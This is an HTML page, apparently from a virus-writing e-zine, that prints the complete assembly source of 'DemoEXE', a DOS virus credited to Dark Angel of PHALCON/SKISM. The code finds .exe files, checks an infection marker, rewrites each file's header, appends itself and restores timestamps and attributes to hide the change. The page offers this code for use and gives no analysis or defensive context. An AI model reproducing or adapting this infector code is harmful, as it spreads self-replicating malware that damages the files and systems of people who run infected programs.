<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1251">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>ThE NeW OrDeR #2</title>
</head>

<body bgcolor="#000000" link="#0000FF" vlink="#000080"
bgproperties="fixed" topmargin="15" leftmargin="20" "
vlink="#000080">

<p align="center"><img src="../Images/viruz.gif" width="560"
height="100"></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../images/Rs.jpg" width="640" height="12"></strong></font></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../Images/fogskul.gif" alt="OneHalf  Virii" width="160"
height="100"></strong></font></p>

<p align="center"><font color="#FF0000" size="6"><strong>DEMOEXE</strong></font></p>

<p align="left"><font color="#00FFFF"><strong>;
--------------------------------------------------------------------------<br>
; Disassembled by FairWind / NRG , nrgteam@mail.ru<br>
;
--------------------------------------------------------------------------</strong></font></p>

<p align="left"><font color="#FFFFFF"><strong>id = 'DA'<br>
<br>
startvirus:<br>
call next<br>
next: pop bp<br>
sub bp,offset next<br>
<br>
push ds<br>
push es<br>
push cs<br>
pop ds<br>
push cs <br>
pop es<br>
lea si,[bp+jmpsave2]<br>
lea di,[bp+jmpsave]<br>
movsw<br>
movsw<br>
movsw<br>
movsw<br>
<br>
mov ah,1Ah<br>
lea dx,[bp+newDTA]<br>
int 21h<br>
<br>
lea dx,[bp+exe_mask]<br>
mov ah,4eh<br>
mov cx,7<br>
findfirstnext:<br>
int 21h<br>
jc done_infections<br>
<br>
mov al,0h<br>
call open<br>
<br>
mov ah,3fh<br>
lea dx,[bp+buffer]<br>
mov cx,1Ah<br>
int 21h<br>
<br>
mov ah,3eh<br>
int 21h<br>
<br>
checkEXE: cmp word ptr [bp+buffer+10h],id<br>
jnz infect_exe<br>
find_next:<br>
mov ah,4fh<br>
jmp short findfirstnext<br>
done_infections:<br>
mov ah,1ah<br>
mov dx,80h<br>
pop es<br>
pop ds<br>
int 21h<br>
mov ax,es<br>
add ax,10h<br>
add word ptr cs:[si+jmpsave+2],ax<br>
add ax,word ptr cs:[si+stacksave+2]<br>
cli<br>
mov sp,word ptr cs:[si+stacksave]<br>
mov ss,ax<br>
sti<br>
db 0eah<br>
jmpsave dd ?<br>
stacksave dd ?<br>
jmpsave2 dd 0fff00000h<br>
stacksave2 dd ?<br>
<br>
creator db '[MPC]',0,'Dark Angel of PHALCON/SKISM',0<br>
virusname db '[DemoEXE] for 40Hex',0<br>
<br>
infect_exe:<br>
les ax, dword ptr [bp+buffer+14h]<br>
mov word ptr [bp+jmpsave2], ax<br>
mov word ptr [bp+jmpsave2+2], es<br>
<br>
les ax, dword ptr [bp+buffer+0Eh]<br>
mov word ptr [bp+stacksave2], es<br>
mov word ptr [bp+stacksave2+2], ax<br>
<br>
mov ax, word ptr [bp+buffer + 8]<br>
mov cl, 4<br>
shl ax, cl<br>
xchg ax, bx<br>
<br>
les ax, [bp+offset newDTA+26]<br>
mov dx, es<br>
push ax<br>
push dx<br>
<br>
sub ax, bx<br>
sbb dx, 0<br>
<br>
mov cx, 10h<br>
div cx<br>
<br>
mov word ptr [bp+buffer+14h], dx<br>
mov word ptr [bp+buffer+16h], ax<br>
<br>
mov word ptr [bp+buffer+0Eh], ax<br>
mov word ptr [bp+buffer+10h], id<br>
<br>
pop dx<br>
pop ax<br>
<br>
add ax, heap-startvirus<br>
adc dx, 0<br>
<br>
mov cl, 9<br>
push ax<br>
shr ax, cl<br>
ror dx, cl<br>
stc<br>
adc dx, ax<br>
pop ax<br>
and ah, 1<br>
<br>
mov word ptr [bp+buffer+4], dx<br>
mov word ptr [bp+buffer+2], ax<br>
<br>
push cs<br>
pop es<br>
<br>
mov cx, 1ah<br>
finishinfection:<br>
push cx<br>
xor cx,cx<br>
call attributes<br>
mov al,2<br>
call open<br>
<br>
mov ah,40h<br>
lea dx,[bp+buffer]<br>
pop cx<br>
int 21h<br>
<br>
mov ax,4202h<br>
xor cx,cx<br>
cwd<br>
int 21h<br>
<br>
mov ah,40h<br>
lea dx,[bp+startvirus]<br>
mov cx,heap-startvirus<br>
int 21h<br>
<br>
mov ax,5701h<br>
mov cx,word ptr [bp+newDTA+16h]<br>
mov dx,word ptr [bp+newDTA+18h]<br>
int 21h<br>
<br>
mov ah,3eh<br>
int 21h<br>
<br>
mov ch,0<br>
mov cl,byte ptr [bp+newDTA+15h]<br>
call attributes<br>
<br>
mo_infections: jmp find_next<br>
<br>
open:<br>
mov ah,3dh<br>
lea dx,[bp+newDTA+30]<br>
int 21h<br>
xchg ax,bx<br>
ret<br>
<br>
attributes:<br>
mov ax,4301h<br>
lea dx,[bp+newDTA+30]<br>
int 21h<br>
ret<br>
<br>
exe_mask db '*.exe',0<br>
heap:<br>
newDTA db 42 dup (?)<br>
buffer db 1ah dup (?)<br>
endheap:<br>
<br>
end startvirus</strong></font></p>

<p align="center"><a href="../TNO#2_start.htm"><img
src="../images/14ic3.gif" border="0" width="60" height="65"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../images/coollogo_com_7565375.jpg" border="0" width="206"
height="53"></a></p>
</body>
</html>
